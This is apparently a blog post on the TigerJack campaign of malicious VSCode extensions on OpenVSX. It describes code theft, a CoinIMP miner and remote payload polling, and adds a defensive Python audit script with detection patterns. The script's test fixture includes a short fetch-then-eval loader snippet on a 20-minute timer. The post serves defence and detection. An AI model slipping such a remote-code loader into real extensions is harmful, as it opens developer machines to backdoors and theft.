A new report from Koi Security has revealed that malicious Visual Studio Code (VSCode) extensions—previously removed from Microsoft’s marketplace—have resurfaced on OpenVSX, a community-maintained registry used by VSCode-compatible editors like Cursor and Windsurf. The threat actor behind this campaign, known as TigerJack, is targeting developers with crypto miners, source code stealers, and dynamic backdoors.
As someone who’s worked extensively with infrastructure automation and secure development environments, this incident is a reminder that even trusted tools can become attack vectors when supply chain hygiene is neglected.
What’s Happening?
- TigerJack has published at least 11 malicious extensions since early 2025.
- Two known extensions—C++ Playground and HTTP Format—were removed from VSCode after 17,000 downloads but remain active on OpenVSX.
- These extensions exfiltrate source code, mine cryptocurrency using host resources, and fetch remote JavaScript payloads for arbitrary code execution.
Why This Is Dangerous
1. Real-Time Code Theft
C++ Playground registers a listener that captures keystrokes and source code edits in near real-time, sending them to external endpoints.
2. Unrestricted Crypto Mining
HTTP Format secretly runs a CoinIMP miner, consuming full system resources without user consent.
3. Dynamic Payload Injection
Extensions like cppplayground, httpformat, and pythonformat poll a remote server every 20 minutes, allowing attackers to push new malicious code without updating the extension.
“TigerJack can dynamically push any malicious payload… stealing credentials, deploying ransomware, injecting backdoors, or monitoring activity in real-time.” – Koi Security
Strategic Takeaways for Developers and IT Teams
- Vet your extensions. Only install packages from verified publishers with transparent GitHub histories and community trust.
- Monitor extension behavior. Use endpoint detection tools to flag unusual resource usage or outbound traffic.
- Segment developer environments. Treat dev machines as privileged assets—limit access, enforce MFA, and isolate them from production.
- Educate your teams. Developers are often the first line of defense. Awareness of supply chain risks is essential.
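As an added example (not code from Koi Security or this post), the audit script below turns the behaviors described above and the "monitor extension behavior" takeaway into a check you can run against an installed-extensions directory. It assumes the layout VS Code and Cursor use (`<extensions dir>/<publisher.name-version>/package.json` plus the script named by the manifest's `main` field, e.g. under `~/.vscode/extensions`); the indicators are plain string matches, so hits are leads for manual review, not verdicts.

```python
import json
import re
from pathlib import Path

# Indicators distilled from the report's description; the three names are the identifiers it quotes.
KNOWN_BAD_NAMES = {"cppplayground", "httpformat", "pythonformat"}
NETWORK = re.compile(r"\b(fetch|https?\.(get|request)|axios(\.\w+)?|XMLHttpRequest)\s*\(")
DYNAMIC_EXEC = re.compile(r"\b(eval|new Function|vm\.runIn\w+Context)\s*\(")
POLLING = re.compile(r"\bsetInterval\s*\(")
EDIT_LISTENER = re.compile(r"onDidChange(TextDocument|TextEditorSelection)\s*\(")
MINER = re.compile(r"coinimp", re.IGNORECASE)

def audit_extension(manifest: dict, source: str) -> list[str]:
    """Return findings for one extension's manifest and main script; an empty list means nothing flagged."""
    findings = []
    name = str(manifest.get("name", "")).lower()
    if name in KNOWN_BAD_NAMES:
        findings.append(f"name '{name}' matches an identifier from the TigerJack report")
    if MINER.search(source):
        findings.append("references CoinIMP (in-process crypto miner)")
    has_net = NETWORK.search(source) is not None
    if has_net and DYNAMIC_EXEC.search(source):
        findings.append("fetches over the network and executes code dynamically (remote payload loader)")
    if has_net and POLLING.search(source):
        findings.append("runs on a timer with network access (periodic beaconing)")
    if has_net and EDIT_LISTENER.search(source):
        findings.append("listens for document edits with network access (possible source exfiltration)")
    return findings

def audit_directory(extensions_dir: Path) -> dict[str, list[str]]:
    """Audit each <extensions_dir>/<ext>/package.json plus the file its 'main' field points to."""
    report = {}
    for manifest_path in Path(extensions_dir).glob("*/package.json"):
        manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
        main = manifest_path.parent / manifest.get("main", "extension.js")
        if not main.exists():  # Node resolves a bare './extension' to './extension.js'
            main = main.with_suffix(".js")
        source = main.read_text(encoding="utf-8", errors="replace") if main.is_file() else ""
        findings = audit_extension(manifest, source)
        if findings:
            report[manifest_path.parent.name] = findings
    return report

# Constructed fixture (not a real extension): a minimal main script carrying the indicators above.
SAMPLE_MANIFEST = {"name": "httpformat", "publisher": "example-publisher", "main": "./extension"}
SAMPLE_SOURCE = """vscode.workspace.onDidChangeTextDocument(sendEdit);  // CoinIMP loaded elsewhere
setInterval(checkServer, 20 * 60 * 1000);
function checkServer() { fetch(REMOTE).then(r => r.text()).then(code => eval(code)); }"""
```

Running `audit_directory(Path.home() / ".vscode" / "extensions")` prints nothing for a clean install; any populated entry in the returned dict is an extension worth reading before it runs again.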
Final Thoughts
This campaign is a sobering reminder that open-source ecosystems, while powerful, are vulnerable to abuse. As IT professionals, we must champion secure development practices, monitor third-party integrations, and treat every extension as a potential risk.